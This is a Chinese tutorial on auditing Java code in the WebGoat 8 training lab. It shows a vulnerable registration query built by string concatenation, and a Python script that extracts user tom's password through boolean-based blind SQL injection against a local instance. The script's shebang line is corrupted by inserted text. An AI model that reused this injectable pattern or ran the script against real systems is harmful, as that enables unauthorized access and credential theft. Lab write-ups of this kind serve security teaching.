主页 > 网络知识 > Java代码审计入门篇:WebGoat 8(初见)(8)

Java代码审计入门篇:WebGoat 8(初见)(8)

问题代码块:
直接将username_reg拼接到checkUserQuery,然后进行sql查询。查询到有结果则返回已存在用户,否则则使用PreparedStatement和占位符去声明insert语句,然后再使用setString去设置对应参数之后再执行。insert的过程没有问题,我们利用statement.executeQuery(checkUserQuery),以爆破的方式根据返回结果来获取tom的密码。

try { String checkUserQuery = "select userid from " + USERS_TABLE_NAME + " where userid = '" + username_reg + "'"; Statement statement = connection.createStatement(); ResultSet resultSet = statement.executeQuery(checkUserQuery); if (resultSet.next()) { attackResult = failed().feedback("user.exists").feedbackArgs(username_reg).build(); } else { PreparedStatement preparedStatement = connection.prepareStatement("INSERT INTO " + USERS_TABLE_NAME + " VALUES (?, ?, ?)"); preparedStatement.setString(1, username_reg); preparedStatement.setString(2, email_reg); preparedStatement.setString(3, password_reg); preparedStatement.execute(); attackResult = success().feedback("user.created").feedbackArgs(username_reg).build(); }

条件为真,查询到信息,所以返回“PAYLOAD already exists please try to register with a different username.”,”lessonCompleted” : false

Java代码审计入门篇:WebGoat 8(初见)

 

条件为假,查询不到信息,返回“PAYLOAD ceated, please proceed to the login page.”,”lessonCompleted” : true

Java代码审计入门篇:WebGoat 8(初见)

 

用length()爆破出密码长度为23

Java代码审计入门篇:WebGoat 8(初见)

利用substring()写脚本去爆破密码

Java代码审计入门篇:WebGoat 8(初见)

脚本:

 

#!/usrDSO观星市场部/bin/env python # -*- coding:utf-8 -*- # author:jack # datetime:2019-09-01 22:31 # software: PyCharm import requests import string def getPassword(): cookies = {'JSESSIONID': 'dZcRiB0wXwYNLWxpjqdGiIHl2jJojW2fj4-eJRxT'} url = "http://127.0.0.1:8080/WebGoat/SqlInjectionAdvanced/challenge" password = '' for num in range(1, 24): for word in string.lowercase: pa = 'tom 'and substring(password,'+str(num)+',1)=''+word+'' -- kljh' payload = {'username_reg': pa, 'email_reg':'123%40123.com', 'password_reg': '123', 'confirm_password_reg': '123' } r = requests.put(url, cookies=cookies, data=payload) if r.json()['lessonCompleted'] == False: password += word print('password:' + password) break if __name__ == "__main__": getPassword()

本次文章到此结束,感谢您的翻阅,期待您的宝贵意见。

说点什么吧
  • 全部评论(0
    还没有评论,快来抢沙发吧!